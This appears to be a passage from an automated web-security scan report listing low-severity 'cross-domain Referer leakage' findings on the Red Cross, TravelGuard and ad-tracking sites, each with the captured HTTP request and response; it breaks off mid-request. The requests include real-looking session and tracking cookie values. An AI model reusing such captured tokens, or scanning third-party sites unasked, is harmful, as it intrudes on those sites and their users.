If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

17.1. http://american.redcross.org/site/PageServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://american.redcross.org
Path:	/site/PageServer

Issue detail

The page was loaded from a URL containing a query string:

http://american.redcross.org/site/PageServer?pagename=ntld_main

The response contains the following links to other domains:

http://www.ifrc.org/en/who-we-are/directory/
http://www.redcrossstore.org/

Request

GET /site/PageServer?pagename=ntld_main HTTP/1.1
Host: american.redcross.org
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JServSessionIdr004=56wkc7syu1.app295a; CLEQ_a=2d41dafa2ef247ac865c7e43c1370000.1; CLEQ_t=1; CLEQ_y=1; __utmz=63105840.1305509976.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63105840.861654851.1305509976.1305509976.1305509976.1; __utmc=63105840; __utmb=63105840.1.10.1305509976

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:05 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Content-Length: 15602

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>

<base href="http://american.redcross.org/site/PageServer?pagename=ntld_main" />

<title>American Red Cross: Donate Funds<
...[SNIP]...
<li id="givetime"><a href="http://www.redcrossstore.org/"><strong>
...[SNIP]...
<font size="1">This site can only accept U.S. issued credit cards. If you are located outside the U.S., please contact your <a href="http://www.ifrc.org/en/who-we-are/directory/">National Red Cross or Red Crescent Society</a>
...[SNIP]...

17.2. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99002087

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

GET /?pixid=99002087 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Mon, 16 May 2011 01:53:52 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1">here</a>
...[SNIP]...

17.3. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99007235

The response contains the following link to another domain:

http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1

Request

GET /?pixid=99007235 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 225
Date: Mon, 16 May 2011 01:53:52 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1">here</a>
...[SNIP]...

17.4. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99003829

The response contains the following link to another domain:

http://ad.doubleclick.net/activity;src=1776986;dcnet=4591;boom=19210;sz=1x1

Request

GET /?pixid=99003829 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ad.doubleclick.net/activity;src=1776986;dcnet=4591;boom=19210;sz=1x1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 225
Date: Mon, 16 May 2011 01:54:10 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://ad.doubleclick.net/activity;src=1776986;dcnet=4591;boom=19210;sz=1x1">here</a>
...[SNIP]...

17.5. http://buy.travelguard.com/TGI2/proc/stateselector.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.travelguard.com
Path:	/TGI2/proc/stateselector.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329

The response contains the following links to other domains:

http://www.scanalert.com/RatingVerify?ref=www.travelguard.com
https://seal.verisign.com/getseal?host_name=buy.travelguard.com&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET /TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:33:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><title>
State Se
...[SNIP]...
<span class="hackerSafe"><a target="_blank" href="//www.scanalert.com/RatingVerify?ref=www.travelguard.com"><img id="imgScanAlert" border="0" src="" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert');
...[SNIP]...
<div class="verisignFooter"><script src="https://seal.verisign.com/getseal?host_name=buy.travelguard.com&size=S&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

17.6. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0

The response contains the following links to other domains:

http://www.google.com/
http://www.google.com/support/bin/answer.py?answer=86640

Request

GET /pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 403 Forbidden
Content-Length: 1207
Content-Type: text/html
Date: Mon, 16 May 2011 01:54:09 GMT
Server: GFE/2.0

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>Sorry...</title><style> body { font-family: verdana, arial, sans-serif; background-color: #fff; color: #000; }</s
...[SNIP]...
<div style="margin-left: 4em;">See <a href="http://www.google.com/support/bin/answer.py?answer=86640">Google Help</a>
...[SNIP]...
<div style="text-align: center; border-top: 1px solid #dfdfdf;">© 2009 Google - <a href="http://www.google.com">Google Home</a>
...[SNIP]...

17.7. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dms.netmng.com
Path:	/si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=

The response contains the following link to another domain:

https://fls.doubleclick.net/activityi;src=1667271;type=jan20557;cat=ftdse646;ord=' + a + '?

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u= HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7Czrdrej4AXZ8pDrsX0VgpEAStDpKdrJ%2Bjt8TcUQh7JEOS2lpVt46GDr7rvlDUY4fj1zvpyDAc48qo6uZg9V7WVnv%2BrAVuXj2fOo72VUX75CXKS64EYxHT95mYYbhrAVqhPvHaTa5e8RxWCFR9XVY0qBe5iz2LQAMXuiv67NNUR5gxgPgYkDS3NnLsO3iBknvJqxJ21wxzPKXpQVnxSmYLM4l4T8thhKB4P%2FB1jXyYokWXN2dthtJxpxLl3VAiZ10BJwG2%2BUx2Wpqu7FF82cSnA%2FJ351T5nkuzQp36SjNgpw4%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1213
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split(
...[SNIP]...
Of('sitrackingid') > 0){
}else{
if( si_pageurl.indexOf('sisearchengine') > 0){
}else{
};
};
}
DeliverThirdPartyPixels();
var axel = Math.random() + "";
var a = axel * 10000000000000;
document.write('<iframe src="https://fls.doubleclick.net/activityi;src=1667271;type=jan20557;cat=ftdse646;ord=' + a + '?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

17.8. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=63965571?

The response contains the following links to other domains:

https://r.turn.com/r/beacon?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA&cid=
https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA

Request

GET /activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=63965571? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:56 GMT
Expires: Mon, 16 May 2011 01:53:56 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1023

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/j
...[SNIP]...
</script>
<script type="text/javascript" src="https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA">
</script>
<noscript>
<img border="0" src="https://r.turn.com/r/beacon?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA&cid=">
</noscript>
...[SNIP]...

17.9. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1774243;type=trave073;cat=trave431;ord=1;num=6946086450479.925?

The response contains the following links to other domains:

https://ad.yieldmanager.com/pixel?id=1209577&t=2
https://pixel.rubiconproject.com/tap.php?v=4112
https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tglb_cs=1&betq=10393=417020
https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing
https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard
https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0
https://www.googleadservices.com/pagead/conversion/1057254703/?label=s2deCJXnSRCv2pH4Aw&guid=ON&script=0

Request

GET /activityi;src=1774243;type=trave073;cat=trave431;ord=1;num=6946086450479.925? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:54:40 GMT
Expires: Mon, 16 May 2011 01:54:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2190

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3" width="1" height="1" /><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tglb_cs=1&betq=10393=417020" width = "1" height = "1" border = "0"><img src="https://ad.doubleclick.net/activity;src=1857234;dcnet=4845;boom=23858;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1057254703/?label=s2deCJXnSRCv2pH4Aw&guid=ON&script=0"/>
</div>
</noscript>
<img src="https://pixel.rubiconproject.com/tap.php?v=4112" border="0" width="1" height="1"><img src="https://n4403ad.doubleclick.net/ad/gn.bfp_travelguard/iperez_02232010;sect=iperez_02232010;sz=1x7"><img src="https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing" /><img src="https://ad.yieldmanager.com/pixel?id=1209577&t=2" width="1" height="1" /><img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0"/><img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard"/></body>
...[SNIP]...

17.10. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3072598970029.503?

The response contains the following links to other domains:

http://action.mathtag.com/mm/HELZ/red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=885712538
http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30
http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2
http://ads.adbrite.com/adserver/vdi/684339?d=110
http://ads.bluelithium.com/pixel?id=601754&t=2
http://bp.specificclick.net/?pixid=99002087
http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502
http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=885712538
http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days
http://view.atdmt.com/action/DPM_Helzberg_Homepage
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&guid=ON&script=0
https://ad.yieldmanager.com/pixel?id=628032&t=2

Request

GET /activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3072598970029.503? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 02:01:38 GMT
Expires: Mon, 16 May 2011 02:01:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2461

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502" width = "1" height = "1" border = "0"><IMG SRC="http://bp.specificclick.net?pixid=99002087" width=0 height=0 border=0><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839" width = "1" height = "1" border = "0"><img src='http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=885712538' width='1' height='1' />
<img height="1" width="1" src="http://view.atdmt.com/action/DPM_Helzberg_Homepage"/><img src="http://ads.bluelithium.com/pixel?id=601754&t=2" width="1" height="1" /><img src="https://ad.yieldmanager.com/pixel?id=628032&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2" width="1" height="1" />
<img src="http://ad.doubleclick.net/activity;src=2583709;type=helz1;cat=helzhp;ord=1;num=885712538?" width=1 height=1 border=0>
<img src="http://action.mathtag.com/mm//HELZ//red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=885712538" width="1" height="1" />
<img src="http://ads.adbrite.com/adserver/vdi/684339?d=110" height="1" width="1">
<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110" height="1" width="1">
<img src="http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days" height="1" width="1">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&guid=ON&script=0"/>
</div>
</noscript><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30" type="text/javascript"></script>
...[SNIP]...

17.11. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?

The response contains the following links to other domains:

http://action.mathtag.com/mm/HELZ/red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=1475687857
http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30
http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2
http://ads.adbrite.com/adserver/vdi/684339?d=110
http://ads.bluelithium.com/pixel?id=601754&t=2
http://bp.specificclick.net/?pixid=99002087
http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502
http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=1475687857
http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days
http://view.atdmt.com/action/DPM_Helzberg_Homepage
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&guid=ON&script=0
https://ad.yieldmanager.com/pixel?id=628032&t=2

Request

GET /activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.helzberg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
